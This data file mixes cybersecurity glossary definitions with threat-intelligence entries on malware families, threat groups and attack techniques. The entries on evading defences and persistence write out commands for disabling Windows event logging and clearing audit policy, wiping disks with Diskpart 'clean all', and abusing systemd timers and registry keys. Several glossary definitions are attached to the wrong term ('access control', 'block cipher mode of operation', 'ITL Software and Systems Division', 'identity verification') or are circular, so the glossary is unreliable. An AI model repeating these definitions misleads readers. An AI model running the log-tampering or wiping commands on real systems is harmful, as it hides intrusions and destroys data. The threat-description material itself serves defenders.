Definition: The decision to permit or deny a subject access to system objects (network, data, application, service, etc.)

Term: Vulnerability Scanning
Definition: A technique used to identify hosts/host attributes and associated vulnerabilities.

Term: IoT Platform
Definition: An IoT platform is typically a third-party vendor provided/hosted SaaS-based tool that is used to support IoT device and endpoint management, connectivity and network management, data management, processing and analysis, application development, cybersecurity, access control, monitoring, event processing, and interfacing/integration. Documentation about such a third party can provide important information about supply chain cybersecurity practices and vulnerabilities to allow for the IoT user to more accurately determine risks related to the use of an IoT platform.

Term: Domain authority
Definition: An FCKMS role that is responsible for determining whether another domain’s FCKMS Security Policy is equivalent to or compatible with its own domain policy. The FCKMS system authority often performs this role.

Term: data linking
Definition: matching and combining data from multiple databases

Term: destroy
Definition: An action applied to a key or other piece of secret data. After a piece of secret data is destroyed, no information about its value can be recovered.

Term: Cyber Threat
Definition: an activity, deliberate or unintentional, with the potential for causing harm to anautomated information system or activity.

Term: non-repudiation
Definition: A service that is used to provide assurance of the integrity and origin of data in such a way that the integrity and origin can be verified by a third party as having originated from a specific entity in possession of the private key of the claimed signatory. In a general information security context, assurance that the sender of information is provided with proof of delivery and the recipient is provided with proof of the sender’s identity, so neither can later deny having processed the information.

Term: subsystem
Definition: A major subdivision of an information system consisting of information, information technology, and personnel that performs one or more specific functions.

Name: HermeticWizard
Type: malware
Description: HermeticWizard is a worm that has been used to spread HermeticWiper in attacks against organizations in Ukraine since at least 2022.

Name: System Network Connections Discovery
Type: attack-pattern
Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate. Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net. In Mac and Linux, netstat and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and Network Device CLI may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>). On ESXi servers, the command `esxi network ip connection list` can be used to list active network connections.

Term: COMSEC material
Definition: Item(s) designed to secure or authenticate telecommunications. COMSEC material includes, but is not limited to key, equipment, modules, devices, documents, hardware, firmware, or software that embodies or describes cryptographic logic and other items that perform COMSEC functions. This includes Controlled Cryptographic Item (CCI) equipment, Cryptographic High Value Products (CHVP) and other Commercial National Security Algorithm (CNSA) equipment, etc.&nbsp;

Term: smart card
Definition: A plastic card containing a computer chip that enables the holder to purchase goods and services, enter restricted areas, access medical, financial, or other records, or perform other operations requiring data stored on the chip.100

Term: spyware
Definition: Malware specifically intended to violate a user’s privacy.

Term: Assurance of domain parameter validity
Definition: Assurance of the arithmetic validity of the domain parameters.

Term: Continuous Diagnostics and Mitigation (CDM)
Definition: A Congressionally established program to provide adequate, risk-based, and cost-effective cybersecurity assessments and more efficiently allocate cybersecurity resources targeted at federal civilian organizations.

Term: Abbreviated Dialing Numbers
Definition: phone book entries kept on the SIM.

Term: ICV
Definition: See checksum.

Term: Asymmetric-key cryptography
Definition: A cryptographic system where users have a private key that is kept secret and used to generate a public key (which is freely provided to others). Users can digitally sign data with their private key and the resulting signature can be verified by anyone using the corresponding public key. Also known as a Public-key cryptography.

Term: design
Definition: Process of defining the system elements, interfaces, and other characteristics of a system of interest in accordance with the requirements and architecture.

Term: message authentication code (MAC)
Definition: A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data. MACs provide authenticity and integrity protection, but not non-repudiation protection.

Name: OSInfo
Type: malware
Description: OSInfo is a custom tool used by APT3 to do internal discovery on a victim's computer and network.

Name: Matryoshka
Type: malware
Description: Matryoshka is a malware framework used by CopyKittens that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences.

Term: Security Management Dashboard
Definition: A tool that consolidates and communicates information relevant to the organizational security posture in near real-time to security management stakeholders.

Term: Algorithm originator-usage period
Definition: The period of time during which a specific cryptographic algorithm may be used by originators to apply protection to data (e.g., encrypt or generate a digital signature).

Term: Discrete Logarithm Cryptography
Definition: Discrete Logarithm Cryptography, which is comprised of both Finite Field Cryptography (FFC) and Elliptic Curve Cryptography (ECC).

Name: Service Stop
Type: attack-pattern
Description: Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. 

Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible. In some cases, adversaries may stop or disable many or all services to render systems unusable. Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server, or on virtual machines hosted on ESXi infrastructure.

Threat actors may also disable or stop service in cloud environments. For example, by leveraging the `DisableAPIServiceAccess` API in AWS, a threat actor may prevent the service from creating service-linked roles on new accounts in the AWS Organization.

Term: compromise
Definition: The unauthorized disclosure, modification, substitution, or use of sensitive data (e.g., a secret key, private key, or secret metadata).

Term: operational environment
Definition: Context determining the setting and circumstance of all influences on a delivered system.

Term: special character
Definition: Any non-alphanumeric character that can be rendered on a standard, American-English keyboard. Use of a specific special character may be application dependent. The list of 7-bit ASCII special characters follows: ` ~! @ # $ % ^ & * ( ) _ + | } { “ : ? > < [ ] \ ; ’ , . / - =

Term: Pseudorandom function (PRF)
Definition: A function that can be used to generate output from a random seed and a data variable, such that the output is computationally indistinguishable from truly random output.

Term: FRR
Definition: False Reject Rate (defined over an authentication transaction)

Term: risk executive (function)
Definition: An individual or group within an organization that helps to ensure that (i) security risk-related considerations for individual information systems, to include the authorization decisions for those systems, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its missions and business functions; and (ii) managing risk from individual information systems is consistent across the organization, reflects organizational risk tolerance, and is considered along with other organizational risks affecting mission/business success.

Name: Internal Defacement
Type: attack-pattern
Description: An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites or server login messages, or directly to user systems with the replacement of the desktop wallpaper. Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.

Term: Internet Message Access Protocol (IMAP)
Definition: A method of communication used to read electronic messages stored in a remote server.

Term: Key derivation
Definition: A process by which one or more keys are derived from a shared secret and other information during a key-agreement transaction.

Term: secret key
Definition: A single cryptographic key that is used by one or more entities with a symmetric key algorithm.

Term: Threat Assessment/Analysis
Definition: Process of formally evaluating the degree of threat to an information system or enterprise and describing the nature of the threat.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented with a supporting infrastructure and policy, provides the services of: 1. Source/identity authentication, 2. Data integrity authentication, and/or 3. Support for signer non-repudiation.

Term: test action
Definition: The action to be performed based on the response to a particular question. Examples of test actions are asking another question or calculating a result.

Term: basic testing
Definition: A method of software testing that examines the functionality of an application without peering into its internal structures or workings. This method of test can be applied to virtually every level of software testing: unit, integration, system and acceptance.

Term: interface
Definition: Common boundary between independent systems or modules where interactions take place.

Term: CPE Name Comparison
Definition: The second phase of CPE name matching, where the individual attribute comparison results from the first phase are analyzed as a collection to determine an overall comparison result for the two names. The result of a name comparison is the identification of the relationship between a source CPE name and target CPE name.

Name: WINDSHIELD
Type: malware
Description: WINDSHIELD is a signature backdoor used by APT32.

Name: Exfiltration Over Physical Medium
Type: attack-pattern
Description: Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

Term: salt
Definition: A bit string generated during digital signature generation using the RSA Signature Scheme with Appendix - Probabilistic Signature Scheme (RSASSA-PSS RSA).

Name: Hardware
Type: attack-pattern
Description: Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: hostnames, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors. Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Compromise Hardware Supply Chain or Hardware Additions).

Term: security control extension
Definition: A statement, used in security control overlays, that extends the basic capability of a security control by specifying additional functionality, altering the strength mechanism, or adding or limiting implementation options.

Term: Assessment Criterion/Criteria
Definition: A rule (or rules) of logic to allow the automated or manual detection of defects. Typically, the assessment criterion in ISCM defines what in the desired state specification is compared to what in the actual state and the conditions that indicate a defect.

Term: Manageability
Definition: Providing the capability for the granular administration of data, including alteration, deletion, and selective disclosure.

Term: Non-Owner
Definition: An OLIR produced by anyone other than the owner of the Reference Document.

Name: Exclusive Control
Type: attack-pattern
Description: Adversaries who successfully compromise a system may attempt to maintain persistence by “closing the door” behind them – in other words, by preventing other threat actors from initially accessing or maintaining a foothold on the same system. 

For example, adversaries may patch a vulnerable, compromised system to prevent other threat actors from leveraging that vulnerability in the future. They may “close the door” in other ways, such as disabling vulnerable services, stripping privileges from accounts, or removing other malware already on the compromised device.

Hindering other threat actors may allow an adversary to maintain sole access to a compromised system or network. This prevents the threat actor from needing to compete with or even being removed themselves by other threat actors. It also reduces the “noise” in the environment, lowering the possibility of being caught and evicted by defenders. Finally, in the case of Resource Hijacking, leveraging a compromised device’s full power allows the threat actor to maximize profit.

Name: MacSpy
Type: malware
Description: MacSpy is a malware-as-a-service offered on the darkweb .

Term: PKI-Card Authentication (PKI-CAK)
Definition: A PIV authentication mechanism that is implemented by an asymmetric key challenge/response protocol using the card authentication key of the PIV Card and a contact or contactless reader.

Name: Raccoon Stealer
Type: malware
Description: Raccoon Stealer is an information stealer malware family active since at least 2019 as a malware-as-a-service offering sold in underground forums. Raccoon Stealer has experienced two periods of activity across two variants, from 2019 to March 2022, then resurfacing in a revised version in June 2022.

Term: EMS
Definition: an improved message system for GSM mobile phones allowing picture, sound, animation and text elements to be conveyed through one or more concatenated SMS messages.

Name: Hidden Files and Directories
Type: attack-pattern
Description: Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).

On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name . Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.

Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app . On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

Additionally, adversaries may name files in a manner that would allow the file to be hidden such as naming a file only a “space” character.

Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.

Term: time-dependent password
Definition: Password that is valid only at a certain time of day or during a specified interval of time.

Term: <em>enc8(i)</em>
Definition: For an integer i ranging from 0 to 255, enc8(i) is the byte encoding of i, with bit 0 being the low-order bit of the byte.

Term: party
Definition: See Entity.

Term: other system
Definition: A system that the system-of-interest interacts with in the operational environment. These systems may provide services to the system-of-interest (i.e., the system-of-interest is dependent on the other systems) or be the beneficiaries of services provided by the system-of-interest (i.e., other systems are dependent on the system-of-interest).

Term: Capability, Privilege and Account Management
Definition: An ISCM capability that ensures that people have the privileges necessary (and only those necessary) to perform their duties, to limit access to that which is necessary.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples of cryptographic operations requiring the use of cryptographic keys include: 
1. The transformation of plaintext data into ciphertext data, 
2. The transformation of ciphertext data into plaintext data, 
3. The computation of a digital signature from data, 
4. The verification of a digital signature, 
5. The computation of an authentication code from data, 
6. The verification of an authentication code from data and a received authentication code, 
7. The computation of a shared secret that is used to derive keying material. 
8. The derivation of additional keying material from a key-derivation key (i.e., a pre-shared key).

Term: security-relevant information
Definition: Any information within the information system that can potentially impact the operation of security functions or the provision of security services in a manner that could result in failure to enforce the system security policy or maintain isolation of code and data.

Term: authentication event
Definition: An attempt by a user to authenticate to an online service that ends in overall success or failure.

Name: netsh
Type: tool
Description: netsh is a scripting utility used to interact with networking components on local or remote systems.

Name: LIGHTWIRE
Type: malware
Description: LIGHTWIRE is a web shell written in Perl that was used during Cutting Edge to maintain access and enable command execution by imbedding into the legitimate compcheckresult.cgi component of Ivanti Secure Connect VPNs.

Term: authenticate
Definition: The process of establishing confidence of authenticity. In this case, it is the validity of a person’s identity and the PIV Card.

Term: Secure channel
Definition: A path for transferring data between two entities or components that ensures confidentiality, integrity, and replay protection as well as mutual authentication between the entities or components. The secure channel may be provided using cryptographic, physical, or procedural methods or a combination thereof.

Term: Informative Reference Developer
Definition: A person, team, or organization that creates an Informative Reference and submits it to the National OLIR Program.

Term: chain
Definition: A set of elements that represents a complete assessment concept and are related by their Parent attribute.

Term: CPO
Definition: See Senior Agency Official for Privacy.

Name: Implant Internal Image
Type: attack-pattern
Description: Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike Upload Malware, this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.

A tool has been developed to facilitate planting backdoors in cloud container images. If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a Web Shell.

Term: Exposure
Definition: The combination of likelihood and impact levels for a risk.

Term: chief information security officer
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.
[Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: CP
Definition: A named set of rules that indicate the applicability of a certificate to a particular community and/or class of applications with common security requirements.

Term: Normal Operation
Definition: The process of using a system.

Term: trusted network-layer onboarding
Definition: A network-layer onboarding process that: provides each device with unique network credentials, provides the device and the network an opportunity to mutually authenticate, is performed over an encrypted channel (to protect network credential confidentiality), does not provide anyone with access to the network credentials, and can be performed repeatedly throughout the device lifecycle (to enable network credentials to be replaced).

Name: Lazarus Group
Type: intrusion-set
Description: Lazarus Group is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB). Lazarus Group has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.

North Korea’s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses “Lazarus Group” as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns.

Term: privileged account
Definition: A system account with the authorizations of a privileged user.

Term: Random Number
Definition: For the purposes of this Recommendation, a value in a set that has an equal probability of being selected from the total population of possibilities and, hence, is unpredictable. A random number is an instance of an unbiased random variable, that is, the output produced by a uniformly distributed random process.

Name: Process Discovery
Type: attack-pattern
Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or <code>Get-Process</code> via PowerShell. Information about processes can also be extracted from the output of Native API calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.

On network devices, Network Device CLI commands such as `show processes` can be used to display current running processes.

Name: ROADSWEEP
Type: malware
Description: ROADSWEEP is a ransomware that was deployed against Albanian government networks during HomeLand Justice along with the CHIMNEYSWEEP backdoor.

Term: Key-derivation function
Definition: A function by which keying material is derived from a shared secret (or a key) and other information.

Term: RTR
Definition: A computer that is a gateway between two networks at open systems interconnection layer 3 and that relays and directs data packets through that internetwork. The most common form of router operates on IP packets.

Term: root user
Definition: A user who is authorized (and, therefore, trusted) to perform security-relevant functions that ordinary users are not authorized to perform.

Term: Known Data
Definition: A category of information that may be present within an attribute of a CPE name. Known data represents any meaningful value about a product (e.g., “sp1”, “2.3.4”, “pro”, NA), but does not include the logical value ANY.

Term: bit
Definition: A binary digit:0 or1.

Term: Cluster
Definition: A group of contiguous sectors.

Term: Capability, Manage and Assess Risk
Definition: The process of managing risks to agency operations (including mission, functions, image, or reputation), agency assets, or individuals resulting from the operation of an information system. It includes risk assessment; cost-benefit analysis; the selection, implementation, and assessment of security controls; and the formal authorization to operate the system. The process considers effectiveness, efficiency, and constraints due to laws, directives, policies, or regulations.

Term: Collector
Definition: Typically, an automated sensor that gathers actual state data. Part of the collection system.

Term: Data Block (Block)
Definition: A sequence of bits whose length is the block size of the block cipher.

Term: Orchestration
Definition: Defines the sequence and conditions in which one Web service invokes other Web services to realize some useful function. An orchestration is the pattern of interactions that a Web service agent must follow to achieve its goal.

Term: issuer
Definition: The organization that is issuing the PIV Card to an Applicant. Typically this is an organization for which the Applicant is working.

Term: audit log
Definition: A chronological record of information system activities, including records of system accesses and operations performed in a given period.

Term: block cipher mode of operation
Definition: The value of the random sample that occurs with the greatest frequency. This value is not necessarily unique.

Term: Passive Tag
Definition: A tag that does not have its own power supply. Instead, it uses RF energy from the reader for power. Due to the lower power, passive tags have shorter ranges than other tags, but are generally smaller, lighter, and cheaper than other tags.

Term: Merkle tree
Definition: A data structure where the data is hashed and combined until there is a singular root hash that represents the entire structure.

Term: countermeasures
Definition: Protective measures prescribed to meet the security objectives (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management controls, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.

Term: ITL Software and Systems Division
Definition: A Solid State Drive (SSD) is a storage device that uses solid state memory to store persistent data.

Term: DRBG mechanism
Definition: The portion of an RBG that includes the functions necessary to instantiate and uninstantiate the RBG, generate pseudorandom bits, (optionally) reseed the RBG and test the health of the the DRBG mechanism.

Term: Collision resistance
Definition: An expected property of a hash function whereby it is computationally infeasible to find a collision, See “Collision”.

Term: sync fabric
Definition: Any on-premises, cloud-based, or hybrid service used to store, transmit, or manage authentication keys generated by syncable authenticators that are not local to the user’s device.

Term: File System
Definition: A software mechanism that defines the way that files are named, stored, organized, and accessed on logical volumes of partitioned memory.

Term: Volatile Memory
Definition: Memory that loses its content when power is turned off or lost.

Term: Originator-usage period
Definition: The period of time in the cryptoperiod of a key during which cryptographic protection may be applied to data using that key.

Name: Trusted Developer Utilities Proxy Execution
Type: attack-pattern
Description: Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.

Smart App Control is a feature of Windows that blocks applications it considers potentially malicious from running by verifying unsigned applications against a known safe list from a Microsoft cloud service before executing them. However, adversaries may leverage "reputation hijacking" to abuse an operating system’s trust of safe, signed applications that support the execution of arbitrary code. By leveraging Trusted Developer Utilities Proxy Execution to run their malicious code, adversaries may bypass Smart App Control protections.

Term: continuity
Definition: The probability that the specified PNT system performance will be maintained for the duration of a phase of operation, presuming that the PNT system was available at the beginning of that phase of operation.

Term: accountability
Definition: Property that ensures that the actions of an entity may be traced uniquely to the entity.

Term: breach
Definition: The loss of control, compromise, unauthorized disclosure, unauthorized acquisition, or any similar occurrence where: a person other than an authorized user accesses or potentially accesses personally identifiable information; or an authorized user accesses personally identifiable information for another than authorized purpose.

Term: Archive facility
Definition: See Key management archive.

Term: Transponder
Definition: An electronic device that communicates with RFID readers. A tag can function as a beacon or it can be used to convey information such as an identifier.

Term: Capability, Software Asset Management
Definition: See Capability, Software Asset Management.

Name: TinyZBot
Type: malware
Description: TinyZBot is a bot written in C# that was developed by Cleaver.

Term: access control
Definition: The official management decision given by a senior organizational official to authorize the operation of an information system and to explicitly accept the risk to organizational operations and assets, individuals, other organizations, and the Nation, based on the implementation of an agreed-upon set of security controls.

Term: insider threat program
Definition: A coordinated collection of capabilities authorized by the organization and used to deter, detect, and mitigate the unauthorized disclosure of information.

Term: HSPD-12
Definition: Homeland Security Presidential Directive; HSPD-12 established the policy for which FIPS 201-2 was developed.

Term: OS
Definition: An integrated collection of service routines for supervising the sequencing of programs by a computer. An operating system may perform the functions of input/output control, resource scheduling, and data management. It provides application programs with the fundamental commands for controlling the computer.

Name: Software Packing
Type: attack-pattern
Description: Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code. 

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.

Term: identity verification
Definition: The process of producing objective evidence that sufficiently demonstrates that the system satisfies its security requirements and security characteristics with the level of assurance that applies to the system.

Term: {<i>X</i>}
Definition: Used to indicate that data X is an optional input to the key derivation function.

Term: non-discretionary access control
Definition: See Mandatory Access Control.

Term: domain
Definition: A domain operating at a single security level (which includes a unique combination of classification, releasabilities, and dissemination controls) that implements a security policy and is administered by a single authority.

Term: hash digest
Definition: See hash digest

Name: Akira _v2
Type: malware
Description: Akira _v2 is a Rust-based variant of Akira ransomware that has been in use since at least 2024. Akira _v2 is designed to target VMware ESXi servers and includes a new command-line argument set and other expanded capabilities.

Term: <em>log2(x)</em>
Definition: Defined as ln(x)/ln(2), where ln is the natural logarithm.

Name: Expand
Type: tool
Description: Expand is a Windows utility used to expand one or more compressed CAB files. It has been used by BBSRAT to decompress a CAB file into executable content.

Term: ISSO
Definition: See system security officer (SSO).

Term: <em>GCD(a, b)</em>
Definition: Greatest Common Divisor of two positive integers a and b. For example, GCD(12, 16) = 4.

Term: Applicability Statement
Definition: A complex logical expression to describe an IT platform, formed out of individual CPE names and references to checks. Applicability statements are used to designate which platforms particular guidance, policies, etc. apply to.

Name: Symmetric Cryptography
Type: attack-pattern
Description: Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

Term: Recommendation
Definition: A special publication of the ITL that stipulates specific characteristics of the technology to use or the procedures to follow to achieve a common level of quality or level of interoperability.

Name: Diskpart
Type: tool
Description: Diskpart is a Windows command-line utility that is used to manage the computer’s drives, which includes disks, partitions, volumes and virtual hard disks. 

Adversaries may abuse Diskpart to perform discovery and destructive actions on a system’s storage. For example, adversaries have been observed using Diskpart to conduct Discovery techniques to enumerate disks and volumes to gather information about the host environment, and to execute commands such as `clean all` to remove partition information and overwrite data across disks, resulting in data destruction.

Term: CKMS implementer
Definition: The entity that installs the CKMS for the FCKMS service provider.

Term: constraints
Definition: Limitation that restricts the design solution, implementation, or execution of the system.

Term: aspect
Definition: The parts, features, and characteristics used to describe, consider, interpret, or assess something.

Term: DAO
Definition: Designated Authorizing Official; A senior organization official that has been given the authorization to authorize the reliability of an issuer.

Term: network-based intrusion detection and prevention system
Definition: An intrusion detection and prevention system that monitors network traffic for particular network segments or devices and analyzes the network and application protocol activity to identify and stop suspicious activity.

Term: activation factor
Definition: An additional authentication factor that is used to enable successful authentication with a multi-factor authenticator.

Name: TINYTYPHON
Type: malware
Description: TINYTYPHON is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm.

Term: approved
Definition: FIPS-approved and/or NIST-recommended. An algorithm or technique that is either: 
1) Specified in a FIPS or NIST Recommendation, 
2) Adopted in a FIPS or NIST Recommendation, or 
3) Specified in a list of NIST-approved security functions.

Term: PCI DSS
Definition: An information security standard administered by the Payment Card Industry Security Standards Council that is for organizations that handle branded credit cards from the major card schemes.

Term: CP
Definition: A named set of rules that indicates the applicability of a certificate to a particular community and/or class of application with common security requirements. For example, a particular certificate policy might indicate applicability of a type of certificate to the authentication of electronic data interchange transactions for the trading of goods within a given price range.

Name: Disable or Modify Windows Event Log
Type: attack-pattern
Description: Adversaries may disable or modify the Windows Event Log to limit data that can be leveraged for detections and audits. Windows Event Log records user and system activity such as login attempts and process creation. This data is used by security tools and analysts to generate detections. 

The EventLog service maintains event logs from various system components and applications. By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to `Security Settings\Local Policies\Audit Policy` for basic audit policy settings or `Security Settings\Advanced Audit Policy Configuration` for advanced audit policy settings. `auditpol.exe` may also be used to set audit policies.

Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the `Set-Service -Name EventLog -Status Stopped` or `sc config eventlog start=disabled` commands (followed by manually stopping the service using `Stop-Service -Name EventLog`). Additionally, the service may be disabled by modifying the "Start" value in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog` then restarting the system for the change to take effect.

There are several ways to disable the EventLog service via registry key modification. Without Administrator privileges, adversaries may modify the "Start" value in the key `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security`, then reboot the system to disable the Security EventLog. With Administrator privilege, adversaries may modify the same values in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System` and `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application` to disable the entire EventLog.

Additionally, adversaries may use `auditpol` and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the `/success` or `/failure` parameters. For example, `auditpol /set /category:"Account Logon" /success:disable /failure:disable` turns off auditing for the Account Logon category. To clear the audit policy, adversaries may run the following lines: `auditpol /clear /y` or `auditpol /remove /allusers`.

Term: trust anchor
Definition: A CA with one or more trusted certificates containing public keys that exist at the base of a tree of trust or as the strongest link in a chain of trust and upon which a Public Key Infrastructure is constructed. 
“Trust anchor” also refers to the certificate of this CA.

Name: Systemd Timers
Type: attack-pattern
Description: Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments. Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over SSH.

Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are Systemd Service unit files that are managed by the systemd system and service manager. Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>~/.config/systemd/user/</code>.

An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence. Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.

Term: Agent
Definition: Software programs that can interact with their environment, receive information, and undertake self-directed actions in service of a larger, externally-specified goal.

Term: data action
Definition: A system operation that processes personally identifiable information.

Name: APT32
Type: intrusion-set
Description: APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.

Term: Inverse Cipher Function (Inverse Cipher Operation)
Definition: The inverse function of the forward cipher function for a given block cipher key.

Term: Capability, Manage and Assess Risk
Definition: See Capability, Manage and Assess Risk.

Name: Office Test
Type: attack-pattern
Description: Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.

There exist user and global Registry keys for the Office Test feature, such as:

